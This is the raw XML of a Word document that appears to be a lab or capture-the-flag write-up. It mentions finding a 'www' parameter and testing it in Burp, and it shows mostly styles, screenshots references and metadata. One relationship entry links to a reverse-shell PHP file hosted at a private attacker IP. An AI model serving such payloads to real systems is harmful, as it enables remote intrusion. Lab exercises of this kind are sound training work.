    <w:p w14:paraId="1FB66C65" w14:textId="26DAB9DD" w:rsidR="002B4F52" w:rsidRDefault="002B4F52" w:rsidP="009A2520">
      <w:r>
        <w:t>This is the final packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BDEB9" w14:textId="3FD8AF55" w:rsidR="0053274A" w:rsidRDefault="0053274A" w:rsidP="005D2E84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0111E1B2" wp14:editId="05CDCDC0">
            <wp:extent cx="7556500" cy="3051175"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19236938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93863" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="3051175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005D2E84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F02370" wp14:editId="7CDD84A3">
            <wp:extent cx="7556500" cy="5245735"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17059198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19839" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="5245735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF09ED" w14:textId="4119E249" w:rsidR="00CD446F" w:rsidRDefault="00CD446F" w:rsidP="00CD446F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I found the parameter “www”. Now, I want to see the result of using this parameter</w:t>
      </w:r>
      <w:r w:rsidR="00632472">
        <w:t xml:space="preserve"> in burp</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EDB23" w14:textId="1332FEC9" w:rsidR="00CD446F" w:rsidRDefault="00632472" w:rsidP="00CD446F">
      <w:r w:rsidRPr="00632472">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26651A72" wp14:editId="0FB44E73">
            <wp:extent cx="4637172" cy="2400508"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="930134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3489" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4637172" cy="2400508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC3693" w14:textId="77777777" w:rsidR="00CD50BC" w:rsidRDefault="00CD50BC" w:rsidP="00CD446F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CD50BC" w:rsidSect="00373463">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="170" w:right="170" w:bottom="170" w:left="170" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>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C95"/>
    <w:rsid w:val="00007167"/>
    <w:rsid w:val="000151FB"/>
    <w:rsid w:val="00031B9D"/>
    <w:rsid w:val="00046E1B"/>
    <w:rsid w:val="000D1D93"/>
    <w:rsid w:val="000E6E3E"/>
    <w:rsid w:val="000F6400"/>
    <w:rsid w:val="00112516"/>
    <w:rsid w:val="00133044"/>
    <w:rsid w:val="001540A0"/>
    <w:rsid w:val="001A2508"/>
    <w:rsid w:val="00224D7C"/>
    <w:rsid w:val="00230B84"/>
    <w:rsid w:val="00255891"/>
    <w:rsid w:val="00272BBC"/>
    <w:rsid w:val="0028406D"/>
    <w:rsid w:val="002857F8"/>
    <w:rsid w:val="002B4F52"/>
    <w:rsid w:val="002C558A"/>
    <w:rsid w:val="00332C78"/>
    <w:rsid w:val="00334983"/>
    <w:rsid w:val="00336297"/>
    <w:rsid w:val="00373463"/>
    <w:rsid w:val="003F489F"/>
    <w:rsid w:val="00403863"/>
    <w:rsid w:val="00435371"/>
    <w:rsid w:val="0045140D"/>
    <w:rsid w:val="004534BB"/>
    <w:rsid w:val="004571C3"/>
    <w:rsid w:val="004717BD"/>
    <w:rsid w:val="00482DBB"/>
    <w:rsid w:val="004A52CE"/>
    <w:rsid w:val="004A6C2F"/>
    <w:rsid w:val="004D66D2"/>
    <w:rsid w:val="004E02BE"/>
    <w:rsid w:val="00515E58"/>
    <w:rsid w:val="0053274A"/>
    <w:rsid w:val="00556BA3"/>
    <w:rsid w:val="005D2E84"/>
    <w:rsid w:val="005D61E3"/>
    <w:rsid w:val="005E2B37"/>
    <w:rsid w:val="005F528F"/>
    <w:rsid w:val="00632472"/>
    <w:rsid w:val="00646AE8"/>
    <w:rsid w:val="006860D1"/>
    <w:rsid w:val="0069388D"/>
    <w:rsid w:val="006B2AC2"/>
    <w:rsid w:val="006D362B"/>
    <w:rsid w:val="006F0B42"/>
    <w:rsid w:val="006F71F2"/>
    <w:rsid w:val="00721EE1"/>
    <w:rsid w:val="007552F8"/>
    <w:rsid w:val="00787A23"/>
    <w:rsid w:val="00790C95"/>
    <w:rsid w:val="007B0FE3"/>
    <w:rsid w:val="007B28C4"/>
    <w:rsid w:val="007D7A84"/>
    <w:rsid w:val="008111E6"/>
    <w:rsid w:val="008226FD"/>
    <w:rsid w:val="00882831"/>
    <w:rsid w:val="008908F2"/>
    <w:rsid w:val="008A1521"/>
    <w:rsid w:val="008A2C6D"/>
    <w:rsid w:val="008E6D0A"/>
    <w:rsid w:val="009328FC"/>
    <w:rsid w:val="00972F0E"/>
    <w:rsid w:val="00976ED4"/>
    <w:rsid w:val="009A2520"/>
    <w:rsid w:val="00A3598F"/>
    <w:rsid w:val="00A478A2"/>
    <w:rsid w:val="00A647B5"/>
    <w:rsid w:val="00A7244C"/>
    <w:rsid w:val="00A725B5"/>
    <w:rsid w:val="00AA2FDB"/>
    <w:rsid w:val="00AC3D7E"/>
    <w:rsid w:val="00AC4AEE"/>
    <w:rsid w:val="00AD0C68"/>
    <w:rsid w:val="00B44702"/>
    <w:rsid w:val="00BC5AFF"/>
    <w:rsid w:val="00C15985"/>
    <w:rsid w:val="00C234E9"/>
    <w:rsid w:val="00C23639"/>
    <w:rsid w:val="00C24DAE"/>
    <w:rsid w:val="00C326ED"/>
    <w:rsid w:val="00C32775"/>
    <w:rsid w:val="00C3383C"/>
    <w:rsid w:val="00C363B8"/>
    <w:rsid w:val="00C47539"/>
    <w:rsid w:val="00C721BF"/>
    <w:rsid w:val="00CB4849"/>
    <w:rsid w:val="00CD446F"/>
    <w:rsid w:val="00CD50BC"/>
    <w:rsid w:val="00CE581D"/>
    <w:rsid w:val="00CF0646"/>
    <w:rsid w:val="00D25AD0"/>
    <w:rsid w:val="00D60B3C"/>
    <w:rsid w:val="00D62644"/>
    <w:rsid w:val="00D811F6"/>
    <w:rsid w:val="00DC18F6"/>
    <w:rsid w:val="00DE3567"/>
    <w:rsid w:val="00E16868"/>
    <w:rsid w:val="00EB2887"/>
    <w:rsid w:val="00EB79C0"/>
    <w:rsid w:val="00EC3AD2"/>
    <w:rsid w:val="00ED5B8A"/>
    <w:rsid w:val="00F04FF9"/>
    <w:rsid w:val="00F0678C"/>
    <w:rsid w:val="00F148C2"/>
    <w:rsid w:val="00F34000"/>
    <w:rsid w:val="00F82E97"/>
    <w:rsid w:val="00FA509D"/>
    <w:rsid w:val="00FD5C95"/>
    <w:rsid w:val="00FD5FF9"/>
    <w:rsid w:val="00FE20C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789EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7C04EC73-011A-4EC3-B9E8-BCF46801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90C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90C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90C9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90C9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90C9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90C9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90C9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90C9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90C9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90C9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90C9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90C9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90C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="כותרת 5 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="כותרת 6 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="כותרת 7 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="כותרת 8 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="כותרת 9 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00790C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90C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90C9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90C9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90C95"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="ציטוט תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00790C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90C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C363B8"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C363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10.9.3.192:8000/rev_shell.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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TotalTime>
  <Pages>6</Pages>
  <Words>357</Words>
  <Characters>2041</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>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כוינה</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>יובל כוינה</cp:lastModifiedBy>
  <cp:revision>651</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-13T21:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-17T12:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>